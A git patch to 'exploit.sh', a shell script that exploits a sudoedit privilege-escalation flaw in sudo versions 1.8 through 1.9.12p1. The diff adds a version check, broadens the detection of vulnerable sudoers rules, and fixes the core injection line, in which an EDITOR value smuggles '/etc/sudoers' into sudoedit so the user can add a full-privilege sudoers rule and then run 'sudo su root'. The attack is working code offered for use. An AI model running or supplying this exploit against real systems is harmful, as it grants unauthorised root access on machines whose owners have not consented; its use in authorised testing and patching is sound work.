From e6fca2453f1ee89f8f1a7ee145c86db3e2ac50b4 Mon Sep 17 00:00:00 2001 From: r3nt0n <25709767+r3nt0n@users.noreply.github.com> Date: Thu, 2 Feb 2023 14:38:51 +0100 Subject: [PATCH] Fixing bugs and improving checks + Improved tests on sudoers config file: **the original script have some pitfalls that wouldnt allow to run the script even if the config is vulnerable**, for example when sudoedit is configured with (ALL) or (ALL : ALL) instead of (root), which are still vulnerable configurations. In the last case, it will also break the original script because of the way the last grep was implemented, its also fixed on this version. + Added **test to check** if sudo **version** is vulnerable. + **Fixed bug** *"EDITOR: command not found" when trying to open the editor and typo in `etc/sudoers` filename. --- exploit.sh | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/exploit.sh b/exploit.sh index 7333f59..078dd2e 100644 --- a/exploit.sh +++ b/exploit.sh @@ -18,15 +18,24 @@ # attacker to add a line to gain privileges on all the files and get a root # shell. -EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-) +if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' +then + echo "> Currently installed sudo version is not vulnerable" + exit 1 +fi + +EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-) if [ -z "$EXPLOITABLE" ]; then - echo "> This user can't run sudoedit as root" + echo "> It doesn't seem that this user can run sudoedit as root" + read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo "$USER ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." - EDITOR = "vim -- /etc/suoders" $EXPLOITABLE + EDITOR="vim -- /etc/sudoers" $EXPLOITABLE sudo su root + exit 0 fi +